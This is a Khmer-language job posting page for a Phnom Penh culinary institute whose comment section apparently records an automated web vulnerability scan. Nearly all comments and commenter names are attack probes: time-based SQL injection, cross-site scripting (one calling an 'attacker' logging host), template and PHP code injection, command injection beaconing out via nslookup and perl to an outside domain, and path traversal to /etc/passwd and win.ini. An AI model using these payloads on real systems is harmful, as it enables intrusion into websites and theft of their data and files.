ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

វិទ្យាស្ថានម្ហូបអាហារកម្ពុជា (ACAC)
វិទ្យាស្ថានម្ហូបអាហារកម្ពុជាគឺជាវិទ្យាស្ថានដែលបណ្តុះបណ្តាលជំនាញវិជ្ជាជីវៈចម្អិនម្ហូបអាហារដំបូងគេនៅប្រទេសកម្ពុជាដែលមានរួមបញ្ចូលកម្មវិធីសិក្សាថ្នាក់អនុវត្តផ្ទាល់នៅក្នុងចង្រ្កានបាយទំនើប ថ្នាក់ទ្រឹស្តី និងថ្នាក់ផ្នែកបដិសណ្ឋារកិច្ចអន្តរជាតិស្របតាមបទដ្ឋានអាស៊ានដោយផ្សាភ្ជាប់ក្រមសីលធម៌ការងារស្តង់ដាប្រទេសស្វីស រួមជាមួយនឹងការបង្រៀនដោយផ្ទាល់ពីប្រធានចុងភៅដែលមានបទពិសោធន៍ជាច្រើនឆ្នាំមកពីខាងប៉ែកអុឺរ៉ុបផងដែរ។ *ពត៌មានបន្ថែម៖ អគារលេខ ២៣ ផ្លូវ ១៣៩ សង្កាត់វាលវង់ ខណ្ខ៧មករា រាជធានីភ្នំពេញ Phone/Telegram: (Cellcard) +855 11 767​​ 136 ឬ (Smart) +855 16 767​​ 136 www.acac.edu.kh e: info@acac.edu.kh

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 20

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 50 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:51:13


  @@Nooa2


 • pHqghUme

  2021-05-06 09:51:09


  1'"


 • pHqghUme

  2021-05-06 09:51:08


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:50:49


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:50:26


  Ww9RXVpe')) OR 571=(SELECT 571 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:50:04


  yEuKJ0ax') OR 165=(SELECT 165 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:49:45


  ZxW7A9IN' OR 237=(SELECT 237 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:49:29


  -1)) OR 368=(SELECT 368 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:49:12


  -5) OR 425=(SELECT 425 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:48:50


  -5 OR 160=(SELECT 160 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:48:26


  6hXS0dCT'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:48:06


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:47:45


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:47:26


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:47:11


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:46:54


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:46:42


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:46:29


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:46:10


  -1" OR 2+313-313-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:46:09


  -1' OR 2+751-751-1=0+0+0+1 or 'DFwQqUOi'='


 • pHqghUme

  2021-05-06 09:46:08


  -1' OR 2+990-990-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:46:07


  -1 OR 2+698-698-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:46:06


  -1 OR 2+406-406-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:46:05


  0KrGOI5F


 • pHqghUme

  2021-05-06 09:45:45


  1


 • pHqghUme

  2021-05-06 09:45:30


  1


 • @@VvWav

  2021-05-06 09:45:13


  1


 • 1'"

  2021-05-06 09:45:09


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:45:08


  1


 • 2XJVKifs')) OR 797=(SELECT 797 FROM PG_SLEEP(15))--

  2021-05-06 09:44:42


  1


 • RdDoPhto') OR 946=(SELECT 946 FROM PG_SLEEP(15))--

  2021-05-06 09:44:19


  1


 • oNkYU1AQ' OR 16=(SELECT 16 FROM PG_SLEEP(15))--

  2021-05-06 09:43:52


  1


 • Guok1236'; waitfor delay '0:0:15' --

  2021-05-06 09:43:32


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 09:43:09


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 09:42:47


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 09:42:30


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 09:42:06


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 09:41:47


  1


 • -1' OR 2+923-923-1=0+0+0+1 or 'hEwF9RtD'='

  2021-05-06 09:41:32


  1


 • -1" OR 2+657-657-1=0+0+0+1 --

  2021-05-06 09:41:32


  1


 • -1 OR 2+886-886-1=0+0+0+1

  2021-05-06 09:41:31


  1


 • -1' OR 2+471-471-1=0+0+0+1 --

  2021-05-06 09:41:31


  1


 • -1 OR 2+458-458-1=0+0+0+1 --

  2021-05-06 09:41:30


  1


 • Ge3Wazbg

  2021-05-06 09:41:29


  1


 • pHqghUme

  2021-05-06 09:41:04


  1


 • pHqghUme

  2021-05-06 09:40:37


  1


 • pHqghUme

  2021-05-06 09:40:19


  1


 • pHqghUme

  2021-05-06 09:40:16


  1


 • pHqghUme

  2021-05-06 09:40:15


  1


 • pHqghUme

  2021-05-06 09:39:48


  1


 • pHqghUme

  2021-05-06 09:39:31


  1


 • pHqghUme

  2021-05-06 09:39:16


  1


 • pHqghUme

  2021-05-06 09:39:00


  1


 • pHqghUme

  2021-05-06 09:38:45


  1


 • pHqghUme

  2021-05-06 09:38:30


  1


 • pHqghUme

  2021-05-06 09:38:15


  1


 • pHqghUme

  2021-05-06 09:38:01


  1


 • pHqghUme

  2021-05-06 09:37:47


  1


 • pHqghUme

  2021-05-06 09:37:30


  1


 • pHqghUme

  2021-05-06 09:37:29


  1


 • pHqghUme

  2021-05-06 09:37:29


  1


 • pHqghUme

  2021-05-06 09:37:28


  1


 • pHqghUme

  2021-05-06 09:37:28


  1


 • pHqghUme

  2021-05-06 09:37:27


  1


 • pHqghUme

  2021-05-06 09:37:11


  1


 • pHqghUme

  2021-05-06 09:36:49


  1


 • pHqghUme

  2021-05-06 09:36:31


  1


 • pHqghUme

  2021-05-06 09:36:28


  1


 • pHqghUme

  2021-05-06 09:36:28


  1


 • pHqghUme

  2021-05-06 09:36:00


  1


 • pHqghUme

  2021-05-06 09:35:32


  1


 • pHqghUme

  2021-05-06 09:35:21


  1<udCBh1<


 • pHqghUme

  2021-05-06 09:35:12


  1<img sRc='http://attacker-9215/log.php?


 • pHqghUme

  2021-05-06 09:35:07


  1<xTFLHs x=9643>


 • pHqghUme

  2021-05-06 09:35:05


  1


 • pHqghUme

  2021-05-06 09:34:57


  1<ifRAme sRc=9165.com></IfRamE>


 • pHqghUme

  2021-05-06 09:34:51


  1<WWJM3G>Z2DYU[!+!]</WWJM3G>


 • pHqghUme

  2021-05-06 09:34:43


  16crfo <ScRiPt >UzNX(9400)</ScRiPt>


 • pHqghUme

  2021-05-06 09:34:42


  1


 • pHqghUme

  2021-05-06 09:34:35


  1<% contenteditable onresize=UzNX(9473)>


 • pHqghUme

  2021-05-06 09:34:26


  1}body{acu:Expre/**/SSion(UzNX(9448))}


 • pHqghUme

  2021-05-06 09:34:21


  1


 • pHqghUme

  2021-05-06 09:34:17


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:34:12


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 09:34:08


  1<input autofocus onfocus=UzNX(9094)>


 • pHqghUme

  2021-05-06 09:34:00


  1&lt;ScRiPt&gt;UzNX(9166)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:33:57


  1


 • pHqghUme

  2021-05-06 09:33:50


  1\u003CScRiPt\UzNX(9976)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 09:33:42


  %31%3C%53%63%52%69%50%74%20%3E%55%7A%4E%58%289580%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 09:33:36


  1<img/src=">" onerror=alert(9782)>


 • pHqghUme

  2021-05-06 09:33:32


  1<img src=xyz OnErRor=UzNX(9498)>


 • pHqghUme

  2021-05-06 09:33:27


  1


 • pHqghUme

  2021-05-06 09:33:26


  1<img src=//xss.bxss.me/t/dot.gif onload=UzNX(9052)>


 • pHqghUme

  2021-05-06 09:33:07


  1<img src=//xss.bxss.me/t/dot.gif onload=UzNX(9052)>


 • pHqghUme

  2021-05-06 09:32:25


  1<img src=//xss.bxss.me/t/dot.gif onload=UzNX(9052)>


 • pHqghUme

  2021-05-06 09:32:17


  1<body onload=UzNX(9100)>


 • pHqghUme

  2021-05-06 09:32:10


  1


 • pHqghUme

  2021-05-06 09:32:09


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9123'>


 • pHqghUme

  2021-05-06 09:32:03


  1<isindex type=image src=1 onerror=UzNX(9927)>


 • pHqghUme

  2021-05-06 09:31:48


  1<ScRiPt >UzNX(9310)</ScRiPt>


 • pHqghUme

  2021-05-06 09:31:46


  1<ScRiPt >UzNX(9310)</ScRiPt>


 • pHqghUme

  2021-05-06 09:31:06


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9118></ScRiPt>


 • pHqghUme

  2021-05-06 09:31:00


  1


 • pHqghUme

  2021-05-06 09:30:56


  1<ScRiPt >UzNX(9801)</ScRiPt>


 • pHqghUme

  2021-05-06 09:30:35


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%55%7A%4E%58%28%39%32%36%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:30:30


  1<script>UzNX(9883)</script>


 • pHqghUme

  2021-05-06 09:30:26


  1


 • pHqghUme

  2021-05-06 09:30:25


  1


 • pHqghUme

  2021-05-06 09:30:24


  1


 • pHqghUme

  2021-05-06 09:30:24


  1<WY3NKE>M9ORY[!+!]</WY3NKE>


 • pHqghUme

  2021-05-06 09:30:24


  1


 • pHqghUme

  2021-05-06 09:30:23


  1


 • pHqghUme

  2021-05-06 09:30:22


  1


 • pHqghUme

  2021-05-06 09:30:13


  1<ScRiPt >UzNX(9630)</ScRiPt>


 • pHqghUme

  2021-05-06 09:30:08


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:30:06


  1


 • pHqghUme

  2021-05-06 09:30:02


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:29:56


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:29:43


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:29:41


  1


 • pHqghUme

  2021-05-06 09:29:36


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:29:29


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:29:23


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:29:16


  acux1754%C0%BEz1%C0%BCz2a%90bcxuca1754


 • pHqghUme

  2021-05-06 09:29:06


  acu10000%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10000


 • pHqghUme

  2021-05-06 09:28:58


  19825444


 • pHqghUme

  2021-05-06 09:28:50


  '"()&%<acx><ScRiPt >UzNX(9586)</ScRiPt>


 • pHqghUme

  2021-05-06 09:28:42


  1'"()&%<acx><ScRiPt >UzNX(9776)</ScRiPt>


 • pHqghUme<cAokjp<

  2021-05-06 09:28:36


  1


 • pHqghUme<img sRc='http://attacker-9569/log.php?

  2021-05-06 09:28:31


  1


 • pHqghUme<5Gd8EZ x=9394>

  2021-05-06 09:28:25


  1


 • pHqghUme<ifRAme sRc=9096.com></IfRamE>

  2021-05-06 09:28:18


  1


 • pHqghUme<W9L3PW>QFC4T[!+!]</W9L3PW>

  2021-05-06 09:28:12


  1


 • pHqghUmea5l3b <ScRiPt >UzNX(9059)</ScRiPt>

  2021-05-06 09:28:06


  1


 • pHqghUme<% contenteditable onresize=UzNX(9481)>

  2021-05-06 09:27:58


  1


 • pHqghUme}body{acu:Expre/**/SSion(UzNX(9807))}

  2021-05-06 09:27:48


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 09:27:41


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 09:27:32


  1


 • pHqghUme<input autofocus onfocus=UzNX(9707)>

  2021-05-06 09:27:28


  1


 • pHqghUme&lt;ScRiPt&gt;UzNX(9344)&lt;/sCripT&gt;

  2021-05-06 09:27:17


  1


 • pHqghUme\u003CScRiPt\UzNX(9278)\u003C/sCripT\u003E

  2021-05-06 09:27:11


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%55%7A%4E%58%289032%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 09:27:03


  1


 • pHqghUme<img/src=">" onerror=alert(9657)>

  2021-05-06 09:26:57


  1


 • pHqghUme<img src=xyz OnErRor=UzNX(9844)>

  2021-05-06 09:26:48


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=UzNX(9171)>

  2021-05-06 09:26:41


  1


 • pHqghUme<body onload=UzNX(9227)>

  2021-05-06 09:26:34


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9225'>

  2021-05-06 09:26:27


  1


 • pHqghUme<isindex type=image src=1 onerror=UzNX(9412)>

  2021-05-06 09:26:19


  1


 • pHqghUme<ScRiPt >UzNX(9660)</ScRiPt>

  2021-05-06 09:26:12


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9666></ScRiPt>

  2021-05-06 09:26:06


  1


 • pHqghUme<ScRiPt >UzNX(9739)</ScRiPt>

  2021-05-06 09:25:59


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%55%7A%4E%58%28%39%33%32%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 09:25:50


  1


 • pHqghUme<script>UzNX(9523)</script>

  2021-05-06 09:25:41


  1


 • pHqghUme<WW8OOI>K1E9R[!+!]</WW8OOI>

  2021-05-06 09:25:34


  1


 • pHqghUme<ScRiPt >UzNX(9391)</ScRiPt>

  2021-05-06 09:25:26


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:25:19


  1


 • acx__${98991*97996}__::.x

  2021-05-06 09:25:04


  1


 • pHqghUme

  2021-05-06 09:24:59


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 09:24:58


  1


 • acx{{98991*97996}}xca

  2021-05-06 09:24:53


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 09:24:47


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:24:42


  1


 • pHqghUme

  2021-05-06 09:24:41


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 09:24:34


  1


 • acux10171%C0%BEz1%C0%BCz2a%90bcxuca10171

  2021-05-06 09:24:29


  1


 • acu6887%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6887

  2021-05-06 09:24:23


  1


 • pHqghUme9427147

  2021-05-06 09:24:17


  1


 • '"()&%<acx><ScRiPt >UzNX(9939)</ScRiPt>

  2021-05-06 09:24:06


  1


 • pHqghUme'"()&%<acx><ScRiPt >UzNX(9324)</ScRiPt>

  2021-05-06 09:23:56


  1


 • pHqghUme

  2021-05-06 09:23:48


  1


 • pHqghUme

  2021-05-06 09:23:40


  1


 • pHqghUme

  2021-05-06 09:23:33


  1


 • pHqghUme

  2021-05-06 09:23:27


  1


 • pHqghUme

  2021-05-06 09:23:21


  1


 • pHqghUme

  2021-05-06 09:23:20


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 09:23:17


  `(nslookup hitidunutkzyi17d4c.bxss.me||perl -e "gethostbyname('hitidunutkzyi17d4c.bxss.me')")`


 • pHqghUme

  2021-05-06 09:23:16


  |(nslookup hitpivvudqdbi1c2ca.bxss.me||perl -e "gethostbyname('hitpivvudqdbi1c2ca.bxss.me')")


 • pHqghUme

  2021-05-06 09:23:12


  1


 • pHqghUme

  2021-05-06 09:23:11


  (nslookup hitgxrckbfxsh3f0d3.bxss.me||perl -e "gethostbyname('hitgxrckbfxsh3f0d3.bxss.me')")


 • pHqghUme

  2021-05-06 09:23:11


  $(nslookup hitpasrrhlmoa18492.bxss.me||perl -e "gethostbyname('hitpasrrhlmoa18492.bxss.me')")


 • pHqghUme

  2021-05-06 09:23:09


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 09:23:09


  |echo yrzobm$()\ tuguhq\nz^xyu||a #' |echo yrzobm$()\ tuguhq\nz^xyu||a #|" |echo yrzobm$()\ tuguhq\nz^xyu||a #


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 09:23:09


  1


 • pHqghUme

  2021-05-06 09:23:08


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 09:23:08


  &echo nzpfmw$()\ mwjezu\nz^xyu||a #' &echo nzpfmw$()\ mwjezu\nz^xyu||a #|" &echo nzpfmw$()\ mwjezu\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:23:07


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 09:23:07


  echo lswwfq$()\ oxmskr\nz^xyu||a #' &echo lswwfq$()\ oxmskr\nz^xyu||a #|" &echo lswwfq$()\ oxmskr\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:23:06


  '"


 • pHqghUme

  2021-05-06 09:23:06


  '"()


 • pHqghUme

  2021-05-06 09:23:06


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 09:23:06


  <!--


 • '"

  2021-05-06 09:23:05


  1


 • pHqghUme

  2021-05-06 09:23:05


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • <!--

  2021-05-06 09:23:05


  1


 • pHqghUme

  2021-05-06 09:23:05


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 09:23:04


  1


 • '.print(md5(31337)).'

  2021-05-06 09:23:04


  1


 • pHqghUme

  2021-05-06 09:23:03


  1


 • `(nslookup hitwpacyjozcqe3ad2.bxss.me||perl -e "gethostbyname('hitwpacyjozcqe3ad2.bxss.me')")`

  2021-05-06 09:23:03


  1


 • ${@print(md5(31337))}\

  2021-05-06 09:23:03


  1


 • ";print(md5(31337));$a="

  2021-05-06 09:23:02


  1


 • pHqghUme

  2021-05-06 09:23:02


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 09:23:02


  1


 • pHqghUme

  2021-05-06 09:23:02


  1


 • |(nslookup hitvisgntkyad2fa5b.bxss.me||perl -e "gethostbyname('hitvisgntkyad2fa5b.bxss.me')")

  2021-05-06 09:23:02


  1


 • ${@print(md5(31337))}

  2021-05-06 09:23:02


  1


 • ';print(md5(31337));$a='

  2021-05-06 09:23:01


  1


 • /xfs.bxss.me

  2021-05-06 09:23:01


  1


 • pHqghUme

  2021-05-06 09:23:01


  1


 • pHqghUme

  2021-05-06 09:23:00


  '+'A'.concat(70-3).concat(22*4).concat(109).concat(88).concat(112).concat(71)+(require'socket' Socket.gethostbyname('hitsi'+'agnsyhjr1c1cc.bxss.me.')[3].to_s)+'


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 09:23:00


  1


 • pHqghUme

  2021-05-06 09:23:00


  1


 • pHqghUme

  2021-05-06 09:22:59


  1


 • pHqghUme

  2021-05-06 09:22:59


  "+"A".concat(70-3).concat(22*4).concat(101).concat(88).concat(104).concat(76)+(require"socket" Socket.gethostbyname("hitkp"+"wjcmbubd91f45.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 09:22:59


  1


 • (nslookup hitojcjgbpzwvad926.bxss.me||perl -e "gethostbyname('hitojcjgbpzwvad926.bxss.me')")

  2021-05-06 09:22:58


  1


 • pHqghUme

  2021-05-06 09:22:58


  1


 • '+'A'.concat(70-3).concat(22*4).concat(97).concat(73).concat(116).concat(73)+(require'socket' Socket.gethostbyname('hitux'+'cwjzseni170d4.bxss.me.')[3].to_s)+'

  2021-05-06 09:22:58


  1


 • $(nslookup hitnuajxgjfkj666a5.bxss.me||perl -e "gethostbyname('hitnuajxgjfkj666a5.bxss.me')")

  2021-05-06 09:22:58


  1


 • pHqghUme

  2021-05-06 09:22:57


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:22:57


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • |echo uufjvz$()\ nfbqxa\nz^xyu||a #' |echo uufjvz$()\ nfbqxa\nz^xyu||a #|" |echo uufjvz$()\ nfbqxa\nz^xyu||a #

  2021-05-06 09:22:57


  1


 • pHqghUme

  2021-05-06 09:22:57


  1


 • "+"A".concat(70-3).concat(22*4).concat(97).concat(68).concat(99).concat(65)+(require"socket" Socket.gethostbyname("hitgf"+"kxyxexoi30d09.bxss.me.")[3].to_s)+"

  2021-05-06 09:22:57


  1


 • '"()

  2021-05-06 09:22:57


  1


 • pHqghUme

  2021-05-06 09:22:56


  1


 • pHqghUme

  2021-05-06 09:22:56


  1&n916783=v979969


 • pHqghUme

  2021-05-06 09:22:56


  HttP://bxss.me/t/xss.html?%00


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 09:22:56


  1


 • pHqghUme

  2021-05-06 09:22:56


  1


 • &echo dmmzdl$()\ etuufp\nz^xyu||a #' &echo dmmzdl$()\ etuufp\nz^xyu||a #|" &echo dmmzdl$()\ etuufp\nz^xyu||a #

  2021-05-06 09:22:56


  1


 • pHqghUme

  2021-05-06 09:22:56


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 09:22:55


  1


 • pHqghUme

  2021-05-06 09:22:55


  1


 • pHqghUme

  2021-05-06 09:22:55


  1


 • pHqghUme

  2021-05-06 09:22:55


  1


 • pHqghUme

  2021-05-06 09:22:55


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 09:22:55


  1


 • echo tpdgvg$()\ hmeyps\nz^xyu||a #' &echo tpdgvg$()\ hmeyps\nz^xyu||a #|" &echo tpdgvg$()\ hmeyps\nz^xyu||a #

  2021-05-06 09:22:55


  1


 • pHqghUme

  2021-05-06 09:22:54


  1


 • pHqghUme

  2021-05-06 09:22:54


  1


 • pHqghUme

  2021-05-06 09:22:54


  1


 • pHqghUme

  2021-05-06 09:22:54


  1


 • pHqghUme

  2021-05-06 09:22:53


  1


 • pHqghUme

  2021-05-06 09:22:53


  1


 • pHqghUme

  2021-05-06 09:22:53


  1


 • pHqghUme

  2021-05-06 09:22:52


  1


 • pHqghUme

  2021-05-06 09:22:52


  1


 • pHqghUme

  2021-05-06 09:22:52


  1


 • pHqghUme

  2021-05-06 09:22:52


  1


 • pHqghUme&n965238=v939650

  2021-05-06 09:22:51


  1


 • pHqghUme

  2021-05-06 09:22:51


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 09:22:51


  1


 • pHqghUme

  2021-05-06 09:22:51


  1


 • pHqghUme

  2021-05-06 09:22:51


  1


 • pHqghUme

  2021-05-06 09:22:51


  bxss.me


 • pHqghUme

  2021-05-06 09:22:50


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 09:22:50


  '.gethostbyname(lc('hitku'.'zqiynrkf84607.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(82).chr(108).chr(87).'


 • pHqghUme

  2021-05-06 09:22:50


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 09:22:50


  1


 • pHqghUme

  2021-05-06 09:22:50


  ".gethostbyname(lc("hityw"."lmxspbzm42877.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(76).chr(101).chr(78)."


 • ".gethostbyname(lc("hitht"."gvhtaxadbcbb4.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(76).chr(106).chr(81)."

  2021-05-06 09:22:49


  1


 • pHqghUme

  2021-05-06 09:22:49


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • '.gethostbyname(lc('hiton'.'hbmnjiyn29599.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(74).chr(120).chr(80).'

  2021-05-06 09:22:48


  1


 • pHqghUme

  2021-05-06 09:22:48


  ^(#$!@#$)(()))******


 • bxss.me

  2021-05-06 09:22:48


  1


 • pHqghUme

  2021-05-06 09:22:47


  1


 • pHqghUme

  2021-05-06 09:22:47


  !(()&&!|*|*|


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 09:22:47


  1


 • pHqghUme

  2021-05-06 09:22:46


  1


 • pHqghUme

  2021-05-06 09:22:46


  )


 • Http://bxss.me/t/fit.txt

  2021-05-06 09:22:46


  1


 • pHqghUme

  2021-05-06 09:22:45


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 09:22:45


  1


 • pHqghUme

  2021-05-06 09:22:45


  1


 • ^(#$!@#$)(()))******

  2021-05-06 09:22:45


  1


 • pHqghUme

  2021-05-06 09:22:44


  1


 • pHqghUme

  2021-05-06 09:22:44


  1


 • )

  2021-05-06 09:22:44


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 09:22:44


  1


 • pHqghUme

  2021-05-06 09:22:44


  1


 • pHqghUme

  2021-05-06 09:22:44


  1


 • !(()&&!|*|*|

  2021-05-06 09:22:44


  1


 • pHqghUme

  2021-05-06 09:22:43


  1


 • pHqghUme

  2021-05-06 09:22:43


  1


 • pHqghUme

  2021-05-06 09:22:43


  1


 • pHqghUme

  2021-05-06 09:22:43


  1


 • pHqghUme

  2021-05-06 09:22:43


  1


 • pHqghUme

  2021-05-06 09:22:43


  1


 • pHqghUme

  2021-05-06 09:22:42


  1


 • pHqghUme

  2021-05-06 09:22:42


  1


 • pHqghUme

  2021-05-06 09:22:41


  ../1


 • pHqghUme

  2021-05-06 09:22:41


  1


 • pHqghUme

  2021-05-06 09:22:41


  1


 • pHqghUme

  2021-05-06 09:22:41


  1


 • pHqghUme

  2021-05-06 09:22:40


  1


 • pHqghUme

  2021-05-06 09:22:40


  1


 • pHqghUme

  2021-05-06 09:22:40


  1


 • pHqghUme

  2021-05-06 09:22:39


  1


 • pHqghUme

  2021-05-06 09:22:39


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 09:22:39


  1


 • pHqghUme

  2021-05-06 09:22:38


  1


 • pHqghUme

  2021-05-06 09:22:38


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 09:22:38


  1


 • pHqghUme

  2021-05-06 09:22:37


  1


 • pHqghUme

  2021-05-06 09:22:37


  1


 • ../pHqghUme

  2021-05-06 09:22:37


  1


 • pHqghUme

  2021-05-06 09:22:36


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 09:22:36


  1


 • pHqghUme

  2021-05-06 09:22:36


  1


 • pHqghUme

  2021-05-06 09:22:35


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 09:22:35


  1


 • pHqghUme

  2021-05-06 09:22:34


  1


 • pHqghUme

  2021-05-06 09:22:34


  1


 • pHqghUme

  2021-05-06 09:22:33


  1


 • pHqghUme

  2021-05-06 09:22:32


  1


 • RGdyZFlZeVo=

  2021-05-06 09:22:32


  1


 • pHqghUme

  2021-05-06 09:22:31


  1


 • pHqghUme

  2021-05-06 09:22:31


  ${10000194+10000155}


 • pHqghUme

  2021-05-06 09:22:31


  1


 • pHqghUme

  2021-05-06 09:22:31


  1


 • pHqghUme

  2021-05-06 09:22:30


  1


 • pHqghUme

  2021-05-06 09:22:30


  1<esi:include src="http://bxss.me/rpb.png"/>


 • ${9999796+9999151}

  2021-05-06 09:22:30


  1


 • pHqghUme

  2021-05-06 09:22:30


  1


 • pHqghUme

  2021-05-06 09:22:29


  1


 • pHqghUme

  2021-05-06 09:22:29


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 09:22:29


  1


 • pHqghUme

  2021-05-06 09:22:29


  1


 • pHqghUme

  2021-05-06 09:22:28


  1


 • pHqghUme

  2021-05-06 09:22:28


  1


